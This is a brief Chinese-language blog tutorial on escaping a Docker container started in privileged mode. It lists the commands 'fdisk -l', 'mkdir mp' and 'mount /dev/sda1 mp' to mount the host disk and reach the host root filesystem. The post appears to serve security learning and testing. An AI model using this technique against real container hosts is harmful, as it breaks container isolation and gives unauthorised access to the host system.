利用特权模式进行 docker 逃逸
使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行 docker run privileged 时,Docker 容器将被允许访问主机上的所有设备,并可以执行 mount 命令进行
挂载。
查看磁盘文件
fdisk -l
创建一个文件夹,并将sda1挂载到新建的文件夹中
mkdir mp
mount /dev/sda1 mp
进入mp目录即成功逃逸到宿主机根目录
标签:文件夹,mount,汇总,逃逸,mp,sda1,docker From: https://www.cnblogs.com/hgschool/p/17030950.html